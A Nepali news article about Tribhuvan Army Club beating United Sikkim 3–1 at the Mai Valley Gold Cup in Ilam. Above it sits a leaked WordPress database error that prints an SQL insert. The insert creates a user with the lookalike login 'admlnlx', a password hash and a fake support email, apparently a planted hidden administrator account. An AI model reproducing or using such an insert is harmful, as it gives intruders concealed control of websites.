WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOIvrQhnBm2TEJz9S9uo4LUBFtt.CX/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 23:01:19', '', 'admlnlx', 'admlnlx')

युनाइटेड सिक्किमलाई ३–१ ले हराउँदै आर्मीको सेमिफाइनल यात्रा शुरु – Gaule Khabar

युनाइटेड सिक्किमलाई ३–१ ले हराउँदै आर्मीको सेमिफाइनल यात्रा शुरु

युनाइटेड सिक्किमलाई ३–१ ले हराउँदै आर्मीको सेमिफाइनल यात्रा शुरु

इलाम–गत वर्षको सर्वाधिक सफल टोली त्रिभुवन आर्मी क्लब चौथो माइभ्याली गोल्डकप फुटबल प्रतियोगिताको सेमिफाइनलमा युनाइटेड सिक्किमलाई ३–१ ले हराउँदै आर्मी अन्तिम चारमा पुगेको हो ।

इलामको ठूलो टुडिखेलमा सन्चाल्न उक्त खेलमा आर्मीको दीनेश हेन्जन, नवयुग श्रेष्ठ र कप्तान भरत खवासले तथा पराजित टोलीका लागि इन्द्रजित क्षेत्रीले गोल गरे । फाइनल प्रवेशका लागि आर्मीले शुक्रबार अर्को ए डिभिजन टोली लक्ष्मी हुन्डाई मनाङ मस्र्याङ्दी क्लबको सामना गर्नेछ ।

दीनेशको गोलमा १५ औैं मिनेटमा आर्मीले खेलमा अग्रता लिएको थियो । तर इन्द्रजित ले ७१ औं मिनेटमा सिक्किममका लागि बराबरी गोल गरेका थिए । तर त्यो अग्रता पनि लामो समय टिकेन । नवयुगले ७६ औं मिनेटमा गोल गर्दै आर्मीलाई पुनः अग्रता दिलाए ।

भरतले इन्जुरी समयको पहिलो मिनेटमा गोल गर्दै आर्मीको जित पक्का गरे । आर्मीका सन्तोष तामाङ खेलको म्यान अफ दी म्याच घोषित भए र उनले १० हजार रुपैयाँ प्राप्त गरे । आर्मीले गत वर्ष मोसफलका ७ वटा नकआउट फुटबल प्रतियोगिताको उपाधि जितेको थियो । माइभ्याली फुटबल क्लबले आयोजना गरेको विजेताले ६ लाख ६६ हजार ६ सय ६६ रुपैयाँ प्राप्त गर्नेछ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका